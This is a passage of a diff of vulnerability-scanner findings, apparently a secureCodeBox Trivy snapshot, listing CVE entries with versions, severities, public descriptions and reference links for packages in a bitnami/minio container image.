"fixedVersion": "10.36-2+deb11u1", "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-0563", - "installedVersion": "2.36.1-8+deb11u1", - "packageName": "libuuid1", + "id": "CVE-2022-1587", + "installedVersion": "10.36-2", + "packageName": "libpcre2-8-0", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-0563", - "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", - "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", - "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", - "https://security.netapp.com/advisory/ntap-20220331-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "https://access.redhat.com/security/cve/CVE-2022-1587", + "https://bugzilla.redhat.com/show_bug.cgi?id=2077983,", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1587", + "https://github.com/PCRE2Project/pcre2/commit/03654e751e7f0700693526b67dfcadda6b42c9d0", + "https://linux.oracle.com/cve/CVE-2022-1587.html", + "https://linux.oracle.com/errata/ELSA-2022-5251.html", + "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1587", + "https://security.netapp.com/advisory/ntap-20221028-0009/", + "https://ubuntu.com/security/notices/USN-5627-1", + "https://ubuntu.com/security/notices/USN-5627-2", + "https://www.cve.org/CVERecord?id=CVE-2022-1587", ], }, "category": "Vulnerability", - "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "description": "An out-of-bounds read vulnerability was discovered in the PCRE2 library in the get_recurse_data_length() function of the pcre2_jit_compile.c file. This issue affects recursions in JIT-compiled regular expressions caused by duplicate data transfers.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", + "name": "pcre2: Out-of-bounds read in get_recurse_data_length in pcre2_jit_compile.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-0563", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-0563", - }, - { - "type": "URL", - "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", - }, - { - "type": "URL", - "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "value": "https://avd.aquasec.com/nvd/cve-2022-1587", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "value": "https://access.redhat.com/security/cve/CVE-2022-1587", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077983,", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1587", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4899", - "installedVersion": "1.4.8+dfsg-2.1", - "packageName": "libzstd1", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-4899", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4899", - "https://github.com/facebook/zstd/issues/3200", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4899", - "https://www.cve.org/CVERecord?id=CVE-2022-4899", - ], - }, - "category": "Vulnerability", - "description": "A vulnerability was found in zstd v1.4.10, where an attacker can supply empty string as an argument to the command line tool to cause buffer overrun.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "buffer overrun in util.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4899", + "value": "https://github.com/PCRE2Project/pcre2/commit/03654e751e7f0700693526b67dfcadda6b42c9d0", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4899", + "value": "https://linux.oracle.com/cve/CVE-2022-1587.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4899", + "value": "https://linux.oracle.com/errata/ELSA-2022-5251.html", }, { "type": "URL", - "value": "https://github.com/facebook/zstd/issues/3200", + "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4899", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4899", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2007-5686", - "installedVersion": "1:4.8.1-1", - "packageName": "login", - "references": [ - "http://secunia.com/advisories/27215", - "http://www.securityfocus.com/archive/1/482129/100/100/threaded", - "http://www.securityfocus.com/archive/1/482857/100/0/threaded", - "http://www.securityfocus.com/bid/26048", - "http://www.vupen.com/english/advisories/2007/3474", - "https://issues.rpath.com/browse/RPL-1825", - ], - }, - "category": "Vulnerability", - "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2007-5686", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", }, { "type": "URL", - "value": "http://secunia.com/advisories/27215", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", }, { "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1587", }, { "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "value": "https://security.netapp.com/advisory/ntap-20221028-0009/", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/26048", + "value": "https://ubuntu.com/security/notices/USN-5627-1", }, { "type": "URL", - "value": "http://www.vupen.com/english/advisories/2007/3474", + "value": "https://ubuntu.com/security/notices/USN-5627-2", }, { "type": "URL", - "value": "https://issues.rpath.com/browse/RPL-1825", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1587", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4235", - "installedVersion": "1:4.8.1-1", - "packageName": "login", + "id": "CVE-2017-11164", + "installedVersion": "2:8.39-13", + "packageName": "libpcre3", "references": [ - "https://access.redhat.com/security/cve/CVE-2013-4235", - "https://access.redhat.com/security/cve/cve-2013-4235", - "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", - "https://github.com/shadow-maint/shadow/issues/317", - "https://github.com/shadow-maint/shadow/pull/545", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", - "https://security-tracker.debian.org/tracker/CVE-2013-4235", - "https://security.gentoo.org/glsa/202210-26", - "https://ubuntu.com/security/notices/USN-5745-1", - "https://ubuntu.com/security/notices/USN-5745-2", - "https://www.cve.org/CVERecord?id=CVE-2013-4235", + "http://openwall.com/lists/oss-security/2017/07/11/3", + "http://www.openwall.com/lists/oss-security/2023/04/11/1", + "http://www.openwall.com/lists/oss-security/2023/04/12/1", + "http://www.securityfocus.com/bid/99575", + "https://access.redhat.com/security/cve/CVE-2017-11164", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11164", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2017-11164", + "https://www.cve.org/CVERecord?id=CVE-2017-11164", ], }, "category": "Vulnerability", - "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", + "description": "In PCRE 8.41, the OP_KETRMAX feature in the match function in pcre_exec.c allows stack exhaustion (uncontrolled recursion) when processing a crafted regular expression.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", + "name": "pcre: OP_KETRMAX feature in the match function in pcre_exec.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4235", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4235", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2013-4235", - }, - { - "type": "URL", - "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "value": "https://avd.aquasec.com/nvd/cve-2017-11164", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/issues/317", + "value": "http://openwall.com/lists/oss-security/2017/07/11/3", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/545", + "value": "http://www.openwall.com/lists/oss-security/2023/04/11/1", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "value": "http://www.openwall.com/lists/oss-security/2023/04/12/1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "value": "http://www.securityfocus.com/bid/99575", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "value": "https://access.redhat.com/security/cve/CVE-2017-11164", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-26", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11164", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-1", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-2", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-11164", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-11164", }, ], "severity": "LOW", @@ -66051,66 +66329,76 @@ commonly used by applications.", "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-19882", - "installedVersion": "1:4.8.1-1", - "packageName": "login", + "id": "CVE-2017-16231", + "installedVersion": "2:8.39-13", + "packageName": "libpcre3", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-19882", - "https://bugs.archlinux.org/task/64836", - "https://bugs.gentoo.org/702252", - "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", - "https://github.com/shadow-maint/shadow/pull/199", - "https://github.com/void-linux/void-packages/pull/17580", - "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", - "https://security.gentoo.org/glsa/202008-09", - "https://www.cve.org/CVERecord?id=CVE-2019-19882", + "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", + "http://seclists.org/fulldisclosure/2018/Dec/33", + "http://www.openwall.com/lists/oss-security/2017/11/01/11", + "http://www.openwall.com/lists/oss-security/2017/11/01/3", + "http://www.openwall.com/lists/oss-security/2017/11/01/7", + "http://www.openwall.com/lists/oss-security/2017/11/01/8", + "http://www.securityfocus.com/bid/101688", + "https://access.redhat.com/security/cve/CVE-2017-16231", + "https://bugs.exim.org/show_bug.cgi?id=2047", + "https://nvd.nist.gov/vuln/detail/CVE-2017-16231", + "https://www.cve.org/CVERecord?id=CVE-2017-16231", ], }, "category": "Vulnerability", - "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", + "description": "** DISPUTED ** In PCRE 8.41, after compiling, a pcretest load test PoC produces a crash overflow in the function match() in pcre_exec.c because of a self-recursive call. NOTE: third parties dispute the relevance of this report, noting that there are options that can be used to limit the amount of stack that is used.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", + "name": "pcre: self-recursive call in match() in pcre_exec.c leads to denial of service", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-19882", + "value": "https://avd.aquasec.com/nvd/cve-2017-16231", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-19882", + "value": "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", }, { "type": "URL", - "value": "https://bugs.archlinux.org/task/64836", + "value": "http://seclists.org/fulldisclosure/2018/Dec/33", }, { "type": "URL", - "value": "https://bugs.gentoo.org/702252", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/11", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/3", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/199", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/7", }, { "type": "URL", - "value": "https://github.com/void-linux/void-packages/pull/17580", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/8", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "value": "http://www.securityfocus.com/bid/101688", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202008-09", + "value": "https://access.redhat.com/security/cve/CVE-2017-16231", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", + "value": "https://bugs.exim.org/show_bug.cgi?id=2047", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-16231", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-16231", }, ], "severity": "LOW", @@ -66119,61 +66407,56 @@ commonly used by applications.", "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-29383", - "installedVersion": "1:4.8.1-1", - "packageName": "login", + "id": "CVE-2017-7245", + "installedVersion": "2:8.39-13", + "packageName": "libpcre3", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-29383", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", - "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", - "https://github.com/shadow-maint/shadow/pull/687", - "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", - "https://www.cve.org/CVERecord?id=CVE-2023-29383", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", - "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + "http://www.securityfocus.com/bid/97067", + "https://access.redhat.com/errata/RHSA-2018:2486", + "https://access.redhat.com/security/cve/CVE-2017-7245", + "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + "https://nvd.nist.gov/vuln/detail/CVE-2017-7245", + "https://security.gentoo.org/glsa/201710-25", + "https://www.cve.org/CVERecord?id=CVE-2017-7245", ], }, "category": "Vulnerability", - "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", + "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 4) or possibly have unspecified other impact via a crafted file.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "Improper input validation in shadow-utils package utility chfn", + "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-29383", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-29383", + "value": "https://avd.aquasec.com/nvd/cve-2017-7245", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", + "value": "http://www.securityfocus.com/bid/97067", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "value": "https://access.redhat.com/errata/RHSA-2018:2486", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/687", + "value": "https://access.redhat.com/security/cve/CVE-2017-7245", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "value": "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-7245", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "value": "https://security.gentoo.org/glsa/201710-25", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-7245", }, ], "severity": "LOW", @@ -66182,220 +66465,727 @@ commonly used by applications.", "attributes": { "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-0563", - "installedVersion": "2.36.1-8+deb11u1", - "packageName": "mount", + "id": "CVE-2017-7246", + "installedVersion": "2:8.39-13", + "packageName": "libpcre3", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-0563", - "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", - "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", - "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", - "https://security.netapp.com/advisory/ntap-20220331-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "http://www.securityfocus.com/bid/97067", + "https://access.redhat.com/errata/RHSA-2018:2486", + "https://access.redhat.com/security/cve/CVE-2017-7246", + "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + "https://nvd.nist.gov/vuln/detail/CVE-2017-7246", + "https://security.gentoo.org/glsa/201710-25", + "https://www.cve.org/CVERecord?id=CVE-2017-7246", ], }, "category": "Vulnerability", - "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 268) or possibly have unspecified other impact via a crafted file.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", + "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-0563", + "value": "https://avd.aquasec.com/nvd/cve-2017-7246", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-0563", + "value": "http://www.securityfocus.com/bid/97067", }, { "type": "URL", - "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "value": "https://access.redhat.com/errata/RHSA-2018:2486", }, { "type": "URL", - "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "value": "https://access.redhat.com/security/cve/CVE-2017-7246", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "value": "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-7246", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "value": "https://security.gentoo.org/glsa/201710-25", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-7246", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "6.2+20201114-2+deb11u1", + "fixedVersion": undefined, "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-29458", - "installedVersion": "6.2+20201114-2", - "packageName": "ncurses-base", + "id": "CVE-2019-20838", + "installedVersion": "2:8.39-13", + "packageName": "libpcre3", "references": [ - "http://seclists.org/fulldisclosure/2022/Oct/41", - "https://access.redhat.com/security/cve/CVE-2022-29458", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", - "https://invisible-island.net/ncurses/NEWS.html#t20220416", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", - "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", - "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", - "https://support.apple.com/kb/HT213488", - "https://ubuntu.com/security/notices/USN-5477-1", - "https://ubuntu.com/security/notices/USN-6099-1", - "https://www.cve.org/CVERecord?id=CVE-2022-29458", + "http://seclists.org/fulldisclosure/2020/Dec/32", + "http://seclists.org/fulldisclosure/2021/Feb/14", + "https://access.redhat.com/security/cve/CVE-2019-20838", + "https://bugs.gentoo.org/717920", + "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", + "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", + "https://errata.almalinux.org/8/ALSA-2021-4373.html", + "https://errata.rockylinux.org/RLSA-2021:4373", + "https://linux.oracle.com/cve/CVE-2019-20838.html", + "https://linux.oracle.com/errata/ELSA-2021-4373.html", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2019-20838", + "https://support.apple.com/kb/HT211931", + "https://support.apple.com/kb/HT212147", + "https://ubuntu.com/security/notices/USN-5425-1", + "https://www.cve.org/CVERecord?id=CVE-2019-20838", + "https://www.pcre.org/original/changelog.txt", ], }, "category": "Vulnerability", - "description": "ncurses 6.3 before patch 20220416 has an out-of-bounds read and segmentation violation in convert_strings in tinfo/read_entry.c in the terminfo library.", + "description": "libpcre in PCRE before 8.43 allows a subject buffer over-read in JIT when UTF is disabled, and \\X or \\R has more than one fixed quantifier, a related issue to CVE-2019-20454.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "ncurses: segfaulting OOB read", + "name": "pcre: Buffer over-read in JIT when UTF is disabled and \\X or \\R has fixed quantifier greater than 1", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-29458", + "value": "https://avd.aquasec.com/nvd/cve-2019-20838", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/41", + "value": "http://seclists.org/fulldisclosure/2020/Dec/32", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-29458", + "value": "http://seclists.org/fulldisclosure/2021/Feb/14", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", + "value": "https://access.redhat.com/security/cve/CVE-2019-20838", }, { "type": "URL", - "value": "https://invisible-island.net/ncurses/NEWS.html#t20220416", + "value": "https://bugs.gentoo.org/717920", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213488", + "value": "https://errata.almalinux.org/8/ALSA-2021-4373.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5477-1", + "value": "https://errata.rockylinux.org/RLSA-2021:4373", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6099-1", + "value": "https://linux.oracle.com/cve/CVE-2019-20838.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-29458", + "value": "https://linux.oracle.com/errata/ELSA-2021-4373.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-29491", - "installedVersion": "6.2+20201114-2", - "packageName": "ncurses-base", - "references": [ - "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", - "http://www.openwall.com/lists/oss-security/2023/04/19/10", - "http://www.openwall.com/lists/oss-security/2023/04/19/11", - "https://access.redhat.com/security/cve/CVE-2023-29491", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", - "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", - "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", - "https://security.netapp.com/advisory/ntap-20230517-0009/", - 